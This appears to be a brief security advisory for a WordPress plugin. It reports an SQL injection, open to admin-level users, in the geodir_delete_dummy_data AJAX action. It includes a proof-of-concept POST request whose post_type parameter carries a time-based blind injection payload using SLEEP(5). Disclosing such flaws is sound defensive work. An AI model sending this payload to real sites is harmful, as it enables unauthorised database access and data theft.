The plugin does not properly sanitise and escape a parameter before using it in a SQL statement, leading to a SQL injection exploitable by high privilege users such as admin.
POST /wp-admin/admin-ajax.php HTTP/1.1
action=geodir_delete_dummy_data&security=72951761a8&post_type=gd_place_detail+WHERE+4508=4508+AND+(SELECT+2067+FROM+(SELECT(SLEEP(5)))nWvn)--+